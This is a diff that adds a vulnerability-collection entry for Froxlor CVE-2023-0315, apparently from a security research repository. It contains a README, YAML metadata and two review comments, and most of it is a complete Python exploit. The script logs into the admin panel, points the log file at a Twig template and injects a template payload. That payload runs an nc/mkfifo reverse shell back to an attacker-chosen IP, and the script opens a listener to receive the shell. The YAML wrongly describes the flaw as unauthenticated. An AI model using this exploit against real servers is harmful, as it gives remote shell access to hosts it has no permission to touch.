diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..d0fe71ba89cc6d5e5d30594e95341686d0f35559
--- /dev/null
+++ b/cve/Froxlor/2023/CVE-2023-0315/README.md
@@ -0,0 +1,28 @@
+# CVE-2023-0315 Proof-of-Concept
+### Overview
+This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
+It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
+An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
+For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
+
+### Dependencies
+* Froxlor 2.0.3 Stable
+* Python 3.8+
+* `requests` Python Library
+* `beautifulsoup4` Python Library
+* Ubuntu 20.04
+* PHP 8.2
+### Usage
+
+1.Verify the required libraries are installed:
+```
+pip install requests beautifulsoup4
+```
+2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
+
+3.Run the PoC:
+```
+python cve-2023-0315.py
+```
+### Additional Information
+This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
diff --git a/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py
new file mode 100644
index 0000000000000000000000000000000000000000..bb07041b5ac551591414f822d0b4fcbb2ccd28ea
--- /dev/null
+++ b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py
@@ -0,0 +1,135 @@ +#!/usr/bin/python3 + +# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution +# Date: 2023-01-08 +# Exploit Author: Askar (@mohammadaskar2) +# CVE: CVE-2023-0315 +# Vendor Homepage: https://froxlor.org/ +# Version: v2.0.3 +# Tested on: Ubuntu 20.04 / PHP 8.2 + +import telnetlib +import requests +import socket +import sys +import warnings +import random +import string +from bs4 import BeautifulSoup +from urllib.parse import quote +from threading import Thread + +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') + + +if len(sys.argv) != 6: + print("[~] Usage : ./froxlor-rce.py url username password ip port") + exit() + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = sys.argv[5] + +request = requests.session() + +def login(): + login_info = { + "loginname": username, + "password": password, + "send": "send", + "dologin": "" + } + login_request = request.post(url+"/index.php", login_info, allow_redirects=False) + login_headers = login_request.headers + location_header = login_headers["Location"] + if location_header == "admin_index.php": + return True + else: + return False + + +def change_log_path(): + change_log_path_url = url + "/admin_settings.php?page=overview&part=logging" + csrf_token_req = request.get(change_log_path_url) + csrf_token_req_response = csrf_token_req.text + soup = BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"]) + print("[+] Main CSRF token retrieved %s" % csrf_token) + + multipart_data = { + + "logger_enabled": (None, "0"), + "logger_enabled": (None, "1"), + "logger_severity": (None, "2"), + "logger_logtypes[]": (None, "file"), + "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/footer.html.twig"), + "logger_log_cron": (None, "0"), + "csrf_token": (None, csrf_token), + "page": (None, "overview"), + "action": (None, ""), + "send": (None, "send") + + } + req = 
request.post(change_log_path_url, files=multipart_data) + response = req.text + if "The settings have been successfully saved." in response: + print("[+] Changed log file path!") + return True + else: + return False + + +def inject_template(): + admin_page_path = url + "/admin_index.php" + csrf_token_req = request.get(admin_page_path) + csrf_token_req_response = csrf_token_req.text + soup = BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"]) + onliner = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f".format(ip, port) + payload = "{{['%s']|filter('exec')}}" % onliner + data = { + "theme": payload, + "csrf_token": csrf_token, + "page": "change_theme", + "send": "send", + "dosave": "", + } + req = request.post(admin_page_path, data, allow_redirects=False) + try: + location_header = req.headers["Location"] + if location_header == "admin_index.php": + print("[+] Injected the payload sucessfully!") + except: + print("[-] Can't Inject payload :/") + exit() + handler_thread = Thread(target=connection_handler, args=(port,)) + handler_thread.start() + print("[+] Triggering the payload ...") + req2 = request.get(admin_page_path) + + +def connection_handler(port): + print("[+] Listener started on port %s" % port) + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", int(port))) + s.listen(1) + conn, addr = s.accept() + print("[+] Connection received from %s" % addr[0]) + t.sock = conn + print("[+] Heads up, incoming shell!!") + t.interact() + + + +if login(): + print("[+] Successfully Logged in!") + index_url = url + "/admin_index.php" + request.get(index_url) + if change_log_path(): + inject_template() + +else: + print("[-] Can't login") \ No newline at end of file 
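Review bot: The header comment block (Exploit Title … Tested on) does not document that the script makes persistent changes to the target that it never reverts: change_log_path() points the logger_logfile setting at /var/www/html/froxlor/templates/Froxlor/footer.html.twig (a template the logger will then presumably write into), and inject_template() stores the Twig expression in the admin theme setting. Anyone running this in a lab needs that stated up front so the settings and the affected template can be restored, and the same two artifacts are what an incident responder would check on a Froxlor install below 2.0.8. I would add to the header: `# NOTE: leaves two persistent changes on the target (logger_logfile -> templates/Froxlor/footer.html.twig, theme setting -> injected Twig expression); neither is reverted by this script.` Separately, the multipart_data dict in change_log_path() lists the "logger_enabled" key twice, so only the second value ("1") is ever sent; the first entry is dead and should be dropped.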
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..5823536abbef629b12ff077f4ea608daf7ab157d
--- /dev/null
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-0315
+source:
+ https://github.com/mhaskar/CVE-2023-0315
+info:
+ name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
+ severity: high
+ description: |
+ Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
+ scope-of-influence:
+ Froxlor 2.0.8 之前的版本
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
+ - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2023-0315
+ cwe-id: CWE-77
+ cnvd-id: None
+ kve-id: None
+ tags: 远程代码执行, RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index fe6ea4727e2c8c4b692317011c41d22b70da44d1..f3d3f72d12ba915987225e18bb8a28a213b905a4 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -155,6 +155,8 @@ cve:
 - CVE-2022-27925
 Grafana:
 - CVE-2021-43798
+ Froxlor:
+ - CVE-2023-0315
 cnvd:
 apache-tomcat:
 - CNVD-2020-10487
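Review bot: The description line states the flaw is exploitable without authentication (在未经身份验证的情况下), which contradicts the cvss-metrics vector in the same file (PR:L) and the accompanying README and PoC, both of which require logging in with admin credentials first; anyone triaging from this metadata would over-state the exposure. I would change that line to `Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。经过身份验证的攻击者可以利用这个漏洞在OS级别执行任意代码。`. Two smaller points: the name field holds a product description rather than the vulnerability's name, and cnvd-id/kve-id use the bare word None, which YAML parses as the string "None" rather than a null — `~` or an empty value is the conventional way to mark "not assigned", if that is what the consumers of this file expect.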